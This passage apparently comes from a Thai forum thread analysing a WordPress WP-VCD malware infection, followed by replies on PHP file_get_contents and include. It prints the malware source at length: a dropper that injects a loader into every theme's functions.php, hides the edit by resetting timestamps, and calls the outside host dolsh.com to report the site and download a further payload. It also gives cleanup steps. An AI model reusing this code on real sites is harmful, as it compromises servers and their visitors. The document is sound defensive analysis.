// .php name; $ip is undefined when it does not exist yet (it is then created).
if( current_user_can('edit_others_pages'))
{
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
}
if (stripos($ip, $_SERVER['REMOTE_ADDR']) === false)
{
// Walk the parent of the WordPress root: reaches other installs too.
$pathx = realpath(dirname(ABSPATH));
readDirsad($pathx);
$ip.=$_SERVER['REMOTE_ADDR'].'
';
@file_put_contents(ABSPATH.'wp-includes/wp-feed.php',$ip);
}
}
// Ads only for anonymous visitors with no admin cookie and an unknown IP.
if(!isset($_COOKIE['wordpress_cf_adm_use_adm']) && !is_user_logged_in())
{
$adtxt=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (stripos($adtxt, $_SERVER['REMOTE_ADDR']) === false)
{
add_filter('the_content','slider_option');
add_action('wp_footer','slider_option_footer');
}
}
// Variant of readDirsad() that MERGES this install's wp-feed.php IP list into
// the wp-feed.php of every sibling install (union of both lists, trimmed and
// de-duplicated, rewritten without a trailing newline). Its only
// non-recursive call site on this page is commented out below, so it appears
// to be dead code in this listing. Same caveats: handle never closed,
// @-suppressed I/O, $ipn undefined when the target file is missing.
function readDirs($path){
$dirHandle = opendir($path);
while($item = readdir($dirHandle)) {
$newPath = $path."/".$item;
if(is_dir($newPath) && $item != '.' && $item != '..') {
if(strpos($newPath,'wp-includes')!== false && strpos($newPath,'wp-includes/')=== false)
{
//echo "Found Folder $newPath<br>";
$ip=@file_get_contents(ABSPATH.'wp-includes/wp-feed.php');
if (file_exists($newPath.'/wp-feed.php'))
{
$ipn=@file_get_contents($newPath.'/wp-feed.php');
}
$iparr = explode("\n", $ip);
$iparr=array_map('trim', $iparr);
$ipnarr = explode("\n", $ipn);
$ipnarr=array_map('trim', $ipnarr);
$result = array_unique(array_merge($iparr, $ipnarr));
$ipx= implode("\n",$result);
@file_put_contents($newPath.'/wp-feed.php',$ipx);
}
readDirs($newPath);
}
else{
// echo ' Found File or .-dir '.$item.'<br>';
}
}
}
// Dead: the readDirs() propagation is disabled in this listing of the payload.
if (file_exists(ABSPATH.'wp-includes/wp-feed.php'))
{
//$path = realpath(dirname(ABSPATH));
//echo "$path<br>";
//readDirs($path);
}
}
wp-includes มีไฟล์ wp-vcd.php (ตัวติดตั้งที่ฝัง loader ลง functions.php ของทุก theme) เนื้อหาของไฟล์:
<?php
// ===== wp-includes/wp-vcd.php: the installer / dropper =====
// Walks wp-content/themes (and one level of subdirectories), prepends the
// loader to every functions.php that does not already contain "WP_V_CD", then
// phones home. How this file is itself triggered is not shown on this page.
error_reporting(0);
ini_set('display_errors', 0);
// Base64-encoded loader source (the blob is redacted in this listing).
$install_code = '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';
// Per-site control password: md5(host . AUTH_SALT), substituted for the
// {$PASSWORD} placeholder in the decoded loader. The 32-hex value in the
// infected functions.php above is therefore fixed at install time; rotating
// AUTH_SALT afterwards does NOT invalidate it -- the file itself must be cleaned.
$install_hash = md5($_SERVER['HTTP_HOST'] . AUTH_SALT);
$install_code = str_replace('{$PASSWORD}' , $install_hash, base64_decode( $install_code ));
$themes = ABSPATH . DIRECTORY_SEPARATOR . 'wp-content' . DIRECTORY_SEPARATOR . 'themes';
// $ping stays true only if NO top-level theme was already infected; $ping2 is
// set when a nested theme directory gets infected.
$ping = true;
$ping2 = false;
if ($list = scandir( $themes ))
{
foreach ($list as $_)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
// Anti-forensics: read the ctime, prepend the loader, then touch() the file
// back to that timestamp. touch() only sets mtime/atime, so the inode ctime
// still records the real write (touch itself updates it) -- `stat` or
// `ls -lc` will show the infection time even though mtime looks untouched.
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . 'functions.php' , $time );
}
else
{
$ping = false;
}
}
}
else
{
// Same for themes one directory deeper (themes/<dir>/<theme>/functions.php).
// For plain files in themes/ (e.g. index.php) scandir() returns false and the
// foreach warns; both are silenced by error_reporting(0).
$list2 = scandir( $themes . DIRECTORY_SEPARATOR . $_);
foreach ($list2 as $_2)
{
if (file_exists($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
$time = filectime($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php');
if ($content = file_get_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php'))
{
if (strpos($content, 'WP_V_CD') === false)
{
$content = $install_code . $content ;
@file_put_contents($themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php', $content);
touch( $themes . DIRECTORY_SEPARATOR . $_ . DIRECTORY_SEPARATOR . $_2 . DIRECTORY_SEPARATOR . 'functions.php' , $time );
$ping2 = true;
}
else
{
//$ping = false;
}
}
}
}
}
}
// Phone home with host + password, and drop a further payload
// (admin.txt -> wp-includes/class.wp.php, contents not shown on this page).
// The first path has a doubled slash (ABSPATH ends in one, as the other uses on
// this page assume), the second does not; both target the same file.
if ($ping) {
$content = @file_get_contents('http://www.dolsh.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
@file_put_contents(ABSPATH . '/wp-includes/class.wp.php', file_get_contents('http://www.dolsh.com/admin.txt'));
}
if ($ping2) {
$content = @file_get_contents('http://www.dolsh.com/o.php?host=' . $_SERVER["HTTP_HOST"] . '&password=' . $install_hash);
@file_put_contents(ABSPATH . 'wp-includes/class.wp.php', file_get_contents('http://www.dolsh.com/admin.txt'));
//echo ABSPATH . 'wp-includes/class.wp.php';
}
}
?><?php error_reporting(0);?>
folder แปลก ๆ เช่น new10 , new10.php (ชื่อสอดคล้องกับ new10.txt ที่ wp-tmp.php ดาวน์โหลดจาก dolsh.com น่าจะเกี่ยวข้องกัน)
wp-includes มีไฟล์แปลก ๆ wp-feed.php ใช้เก็บ IP ของผู้ใช้ที่มีสิทธิ์ edit_others_pages (editor/admin) ที่เคยเข้าเว็บ เพื่อไม่แสดงโฆษณาให้ IP เหล่านั้น (ดู readDirsad / current_user_can ใน wp-tmp.php)
class.wp.php (wp-vcd.php ดาวน์โหลดจาก dolsh.com/admin.txt มาเขียนไว้ เนื้อหาไม่ได้แสดงในโพสต์นี้ ต้องลบทิ้งเช่นกัน)
ธีมที่โดน
grido
postline
threattocreativity
terminally
…teen ของ wordpress
ถ้าเป็น theme ที่มีการอัปเดต การอัปเดตจะเขียนทับไฟล์เดิม ทำให้ code ที่ถูกฝังใน functions.php ของ theme นั้นหายไปด้วย แต่ไม่ได้แปลว่าหายขาด เพราะ _verify_activeatewidgets (hook admin_head) และ wp-vcd.php จะฝัง code กลับเข้า functions.php ของทุก theme ที่เขียนได้อีก ต้องลบ wp-includes/wp-tmp.php, wp-includes/wp-vcd.php, wp-includes/class.wp.php, wp-feed.php และ code ที่ฝังใน functions.php ของ ทุก theme (รวม theme ที่ไม่ได้ใช้งาน) พร้อมกันในครั้งเดียว แล้วแก้ permission และเปลี่ยนรหัสผ่าน/salt ใน wp-config.php
บางโฮสต์ปิดฟังก์ชัน file_get_contents (ผ่าน disable_functions) หรือปิด allow_url_fopen ไม่ให้ดึง URL ภายนอก เพราะไม่ปลอดภัย แต่ code ที่ฝังมีทางเลือกใช้ curl (file_get_contents_tcurl) และยังมี wp-tmp.php ที่ cache ไว้ในเครื่องเป็น fallback การปิดอย่างใดอย่างหนึ่งจึงไม่พอที่จะหยุดมัน
<?php
// Reads a local file and prints its bytes as-is: nothing in it is executed,
// and nothing is HTML-escaped either, so only use it for content you trust.
echo file_get_contents("test.txt");
?><?php
// Same thing with the result held in a variable first. file_get_contents()
// returns false (not "") when the file cannot be read; check for that before echoing.
$homepage = file_get_contents('demo.txt');
echo $homepage;
?>
ดึงข้อมูลจากเว็บ google.com มาแสดงผล
<?php
// Remote fetch: needs allow_url_fopen=On, and echoes the remote body into this
// page unescaped (any script the remote host returns runs as our site). This is
// the same fetch primitive the injected loader above uses against code10.php.
$homepage = file_get_contents('http://www.google.com/');
echo $homepage;
?>
file_get_contents() สามารถเรียกใช้ไฟล์ php ได้ไหมคะ
ลองดูแล้วมันไม่ทำงานเลย
ได้แต่ html
ทำได้ครับ ผมลองดึงผ่านเว็บหรือผ่าน path อื่นแล้ว แต่ต้องกำหนด &lt;base href&gt; ด้วยครับ ไม่งั้นมันจะไม่โหลดพวกรูปมาด้วย (ข้อควรระวัง: HTML ที่ดึงมาจะถูก echo ออกไปทั้งก้อน script ของเว็บปลายทางจะรันใน origin ของเว็บเราเอง ใช้กับเว็บที่เราควบคุมเท่านั้น)
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<!-- <base> makes relative image/CSS URLs inside the fetched HTML resolve against the remote site -->
<base href="http://fund.dgr.go.th/rent/">
<?php
// Fetches the remote page over HTTP (needs allow_url_fopen) and echoes it
// unescaped: every <script> and <form> in the response runs in YOUR origin.
// Only do this for a host you control.
$source = file_get_contents('http://fund.dgr.go.th/rent/index.php');
echo $source;
?>
ได้ครับ แต่ก็จำไว้ด้วยว่าค่ารีเทิร์นของฟังก์ชัน file_get_contents() จะเป็น string นะครับ (เป็นแค่ข้อความ code PHP ในไฟล์นั้นจะไม่ถูกรัน)
สมมติ
test.php
<?php /* test.php: the file the example below reads */ echo "helloworld"; ?>
$a = file_get_contents("test.php"); // returns the raw source as a string; the PHP inside is NOT executed
echo $a;
ผลคือ
ไม่เห็นครับ เพราะเจอ tag < ปิดข้อความไว้ ต้องเปิด view source ถึงจะเห็น
<?php
// Runs test.php and captures its output. require EXECUTES the file, so never
// point it at a user-controlled path or at content fetched from another host
// (the injected theme_temp_setup() above does exactly that via a temp file).
ob_start(); require './test.php'; $s = ob_get_clean(); echo $s; ?>
ไม่ได้ครับ ไปใช้ include/require ดีกว่านะ ได้แน่นอนครับ (ข้อควรระวัง: include/require คือการ รัน code ในไฟล์นั้น ห้ามใช้กับ path ที่มาจากผู้ใช้ หรือกับเนื้อหาที่ดาวน์โหลดมาจากเว็บอื่น — ฟังก์ชัน theme_temp_setup ใน code ที่ถูกฝังด้านบนทำแบบนั้นพอดี คือดึง code จาก server ของคนร้าย เขียนลง temp file แล้ว include)
อื่นๆ http://www.thaicreate.com/php/forum/119528.html
โดนอยู่เว็บเดียว น่าเกียวกับ plugin ด้วย